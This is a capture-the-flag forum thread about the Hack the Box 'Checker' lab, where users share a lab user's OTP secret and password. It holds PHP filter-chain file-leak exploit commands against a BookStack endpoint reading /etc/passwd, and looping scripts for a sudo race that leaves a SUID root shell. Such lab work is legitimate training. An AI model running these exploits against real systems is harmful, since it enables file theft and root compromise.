Checker Hack the Box Season 7 (Linux Hard)
by RedBlock - Saturday February 22, 2025 at 02:24 PM
#71
(Feb 23, 2025, 09:25 AM)x1rx Wrote:
(Feb 23, 2025, 01:11 AM)0xbeef Wrote:
(Feb 23, 2025, 01:08 AM)v3701 Wrote:
(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret 
DVDBRAODLCWF7I2ONA4K5LQLUE

then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt

How did you find the secret?

In this file 
/backup/home_backup/home/reader/.google_authenticator

how did you find "/backup/home_backup/home/reader/.google_authenticator"

I want to know that too, as /home/reader/.google_authenticator isn't readable by the exploit
#72
(Feb 23, 2025, 09:30 AM)jsvensson Wrote:
(Feb 23, 2025, 09:25 AM)x1rx Wrote:
(Feb 23, 2025, 01:11 AM)0xbeef Wrote:
(Feb 23, 2025, 01:08 AM)v3701 Wrote:
(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret 
DVDBRAODLCWF7I2ONA4K5LQLUE

then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt

How did you find the secret?

In this file 
/backup/home_backup/home/reader/.google_authenticator

how did you find "/backup/home_backup/home/reader/.google_authenticator"

I want to know that too, as /home/reader/.google_authenticator isn't readable by the exploit

You can find it at the page http://checker.htb/books/linux-security/...up-with-cp
#73
(Feb 23, 2025, 09:30 AM)jsvensson Wrote:
(Feb 23, 2025, 09:25 AM)x1rx Wrote:
(Feb 23, 2025, 01:11 AM)0xbeef Wrote:
(Feb 23, 2025, 01:08 AM)v3701 Wrote:
(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On
https://it-tools.tech/otp-generator
Use the secret 
DVDBRAODLCWF7I2ONA4K5LQLUE

then ssh reader@checker.htb:hiccup-publicly-genesis
You will get user.txt

How did you find the secret?

In this file 
/backup/home_backup/home/reader/.google_authenticator

how did you find "/backup/home_backup/home/reader/.google_authenticator"

I want to know that too, as /home/reader/.google_authenticator isn't readable by the exploit

Read the blog post where they tell you to copy it in an insecure way.
#74
(Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can't make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`

Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'

filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"

$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
  "Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
  "X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
    filters_chain_oracle.main()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
    self.bruteforcer.bruteforce()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
    for self.base64, self.data in super().bruteforce():
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
    decoded = b64decode(self.pad_base64(base64))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/base64.py", line 88, in b64decode
    return binascii.a2b_base64(s, strict_mode=validate)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4

Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.

Got stuck here.
Why is your X-CSRF-TOKEN so short? Burp shows mine as 'aseyJpdiI6Im1oZXZQYkR6dUVsY0xPeGZjQzJVZGc9PSIsInZhbHVlIjoidmNtR2FDSFN5TENsdUcvNHc0ZFBtSjZPdFVZV0VYbTdaQnRPeVpIdXFvRWVHN1BnTktVbnMzbzJjelBFZkY5ekVVQkd4OWhrZXR6OGRzdmtBV3R1SFJVOUwwZGhPVmlMdDJxeWFPMUVBeUdDZ1FHeThwVERZdDlhc1NnOFlVSDkiLCJtYWMiOiIxMzY5ZjQ5N2I1Y2FlMDg1MTZhYmMxODg5OGFjZGNhMGE5Y2E0NDIwN2QzMTVjOWVlMjk3OGU2NjZkMTE0ZDI4IiwidGFnIjoiIn0%3D', this long. Is this the reason I'm getting the error?
#75
Can someone please provide the steps to get the LFI working using filters_chain_oracle_exploit.py?
#76
(Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can't make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`

Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'

filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"

$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
  "Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
  "X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
    filters_chain_oracle.main()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
    self.bruteforcer.bruteforce()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
    for self.base64, self.data in super().bruteforce():
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
    decoded = b64decode(self.pad_base64(base64))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/base64.py", line 88, in b64decode
    return binascii.a2b_base64(s, strict_mode=validate)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4

Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.

You need to make sure that you have Content-Type set to application/json and that you use --json=1. You will also get that error if the file doesn't exist.
#77
(Feb 24, 2025, 10:46 AM)ZenMunk3y Wrote:
(Feb 23, 2025, 04:43 AM)idontevensmokebro Wrote: Can't make LFI work? Keep getting `binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4`

Updated requestor.py
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'

filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"

$ py filters_chain_oracle_exploit.py --target 'http://checker.htb/ajax/page/9/save-draft' --data '{"name":"POC"}' --verb PUT --headers "$(cat headers.json)" --file /etc/passwd --parameter html --time_based_attack True --proxy http://127.0.0.1:8080
[*]The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*]The following local file is leaked : /etc/passwd
[*]Running PUT requests
[*]Additionnal data used : {"name":"POC"}
[*]Additionnal headers used : {
  "Cookie": "teampass_session=...; jstree_select=1; XSRF-TOKEN=...; bookstack_session=...",
  "X-CSRF-TOKEN": "nk9IAZ4bH9CTlwJjtb3rZAiEy5l5XtXv0Ogv06B9"
}
[+] Error handling duration : -0.179906
[*]Trying the process in a warning friendly way
Traceback (most recent call last):
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
    filters_chain_oracle.main()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
    self.bruteforcer.bruteforce()
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
    for self.base64, self.data in super().bruteforce():
  File "/tmp/Checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
    decoded = b64decode(self.pad_base64(base64))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/base64.py", line 88, in b64decode
    return binascii.a2b_base64(s, strict_mode=validate)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4

Sometimes it works with `--delay 0.4`, but doesn't leak anything correctly.

You need to make sure that you have Content-Type set to application/json and that you use --json=1. You will also get that error if the file doesn't exist.

SSRF not working anymore. I did everything mentioned and am still receiving the same error:
python3 filters_chain_oracle_exploit.py --target http://checker.htb/ajax/page/8/save-draft --file '/etc/passwd' --verb PUT --parameter html --headers '{"X-CSRF-TOKEN":"LyRqi6GjdLyhfdISb0ms5UUCS6e69Z76EmPgEEbX","Content-Type":"application/json","Referer":"http://checker.htb/books/test/draft/8","Cookie":"XSRF-TOKEN=eyJpdiI6IlNsa2VtLzQxZFhoN2IycHN3bldiUWc9PSIsInZhbHVlIjoiK3J5VjRGU3JiK1hvR0JLVXFoUHI0RDd1SXFUWXRNdzAzRFRKRmlFeHNUc1kxSXN4bzlLZ2lGRTdWZVJ2aVl3STVvamd1d0dyWEJNcnpvdXRlV2Q0U0dVeUhvZGpmQjQ2bWswTE1wdldybWxVS0V1TDFkaHRUQ25QM3pFN1kxa00iLCJtYWMiOiIyOGI1NDU1MjFhMzU5YzY2OTY1YmEzN2JmYzFkYWRmMmM5NTNmNmM4OTU0MGQ2ZjZhYTA5ZGM3OTkyOTRiOTJjIiwidGFnIjoiIn0%3D; bookstack_session=eyJpdiI6InZIWDdzS1hZM092NHVjSmt1MnJnZGc9PSIsInZhbHVlIjoiV2I2ZnozeXQ5WFNrc2JwUFpMNk9IcTFWMlo5ejlKazlLNTAzVnlFQnZ1dGdwSDhUbDExc0JnVnZvUzlkY2NkZk1SblB4dUlwUklBQXBIcE4rN2VvYWEzMGdaNUFsMGhtMU0zbVorL3JhdUhaWG0yWE9qdUtTc09oSGMwWGhVdVAiLCJtYWMiOiIxYWViNzU0NDk5ZjI1ZDhiYjcwMDU4NTgwYzBmYjY3OTBiNGJiYmQ1ZjNhYTE3MTI2ZmU0YmViZTBmYTVmOGVkIiwidGFnIjoiIn0%3D"}' --proxy http://127.0.0.1:8080  --time_based_attack True --json=1
The following URL is targeted : http://checker.htb/ajax/page/8/save-draft
The following local file is leaked : /etc/passwd
Running PUT requests
Additionnal headers used : {"X-CSRF-TOKEN":"LyRqi6GjdLyhfdISb0ms5UUCS6e69Z76EmPgEEbX","Content-Type":"application/json","Referer":"http://checker.htb/books/test/draft/8","Cookie":"XSRF-TOKEN=eyJpdiI6IlNsa2VtLzQxZFhoN2IycHN3bldiUWc9PSIsInZhbHVlIjoiK3J5VjRGU3JiK1hvR0JLVXFoUHI0RDd1SXFUWXRNdzAzRFRKRmlFeHNUc1kxSXN4bzlLZ2lGRTdWZVJ2aVl3STVvamd1d0dyWEJNcnpvdXRlV2Q0U0dVeUhvZGpmQjQ2bWswTE1wdldybWxVS0V1TDFkaHRUQ25QM3pFN1kxa00iLCJtYWMiOiIyOGI1NDU1MjFhMzU5YzY2OTY1YmEzN2JmYzFkYWRmMmM5NTNmNmM4OTU0MGQ2ZjZhYTA5ZGM3OTkyOTRiOTJjIiwidGFnIjoiIn0%3D; bookstack_session=eyJpdiI6InZIWDdzS1hZM092NHVjSmt1MnJnZGc9PSIsInZhbHVlIjoiV2I2ZnozeXQ5WFNrc2JwUFpMNk9IcTFWMlo5ejlKazlLNTAzVnlFQnZ1dGdwSDhUbDExc0JnVnZvUzlkY2NkZk1SblB4dUlwUklBQXBIcE4rN2VvYWEzMGdaNUFsMGhtMU0zbVorL3JhdUhaWG0yWE9qdUtTc09oSGMwWGhVdVAiLCJtYWMiOiIxYWViNzU0NDk5ZjI1ZDhiYjcwMDU4NTgwYzBmYjY3OTBiNGJiYmQ1ZjNhYTE3MTI2ZmU0YmViZTBmYTVmOGVkIiwidGFnIjoiIn0%3D"}
[+] Error handling duration : -0.03959800000000002
Trying the process in a warning friendly way
Traceback (most recent call last):
  File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 174, in <module>
    filters_chain_oracle.main()
  File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle_exploit.py", line 148, in main
    self.bruteforcer.bruteforce()
  File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 422, in bruteforce
    for self.base64, self.data in super().bruteforce():
                                  ^^^^^^^^^^^^^^^^^^^^
  File "/home/blasphemer/htb/checker/php_filter_chains_oracle_exploit/filters_chain_oracle/core/bruteforcer.py", line 390, in bruteforce
    decoded = b64decode(self.pad_base64(base64))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/base64.py", line 88, in b64decode
    return binascii.a2b_base64(s, strict_mode=validate)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
binascii.Error: Invalid base64-encoded string: number of data characters (1) cannot be 1 more than a multiple of 4
Every time I run it I receive this error. I have also changed the lines below in the code:
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
Still receiving this error. Any solutions, please? And can anyone check whether they are still able to read files with it?
#78
Thanks for all the help, you guys rock as always!
#79
(Feb 24, 2025, 02:40 PM)blasphemer Wrote:
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
filter_chain = f"<img src='data:image/png;base64,{b64encode(filter_chain.encode()).decode()}'/>"
Still receiving this error. Any solutions, please? And can anyone check whether they are still able to read files with it?

Try to use the other endpoint. I had lots of trouble with that one. That error will still happen from time to time, but you should be able to extract something.
#80
(Feb 23, 2025, 03:26 AM)slimeylimey Wrote: For root, you can compile and use the previously mentioned C file (assume located at /tmp/exploit), then do this if you are having issues:

/tmp/loop-exploit.sh
#!/bin/bash
while true; do
  /tmp/exploit
done
chmod +x /tmp/loop-exploit.sh

/tmp/loop-check.sh
#!/bin/bash
while true; do
    sudo /opt/hash-checker/check-leak.sh bob
done
chmod +x /tmp/loop-check.sh

Run both of these scripts simultaneously; at some point the stars will align and the injected data in RW shared memory will be executed via popen().

After some time, you can run /bin/bash -p and drop into a root shell, having set the SUID bit on it.

Cheers.

How did you come up with something like this, and where did you find the PoC you sent below?